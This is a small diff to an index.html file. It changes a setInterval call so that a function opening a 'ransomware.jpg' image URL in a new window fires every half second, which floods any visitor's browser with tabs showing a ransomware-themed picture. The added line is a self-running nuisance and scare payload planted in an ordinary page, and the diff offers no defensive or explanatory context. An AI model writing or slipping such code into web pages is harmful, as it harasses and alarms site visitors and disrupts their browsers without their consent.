--- a/index.html
+++ b/index.html
@@ -26,7 +26,7 @@
     function opentab(){
       window.open("https://www.lsntap.org/sites/default/files/2025-02/ransomware.jpg");
     }
-    setInterval(runEverySecond, 500);
+    setInterval(opentab, 500);
   </script>
 </body>
 </html>
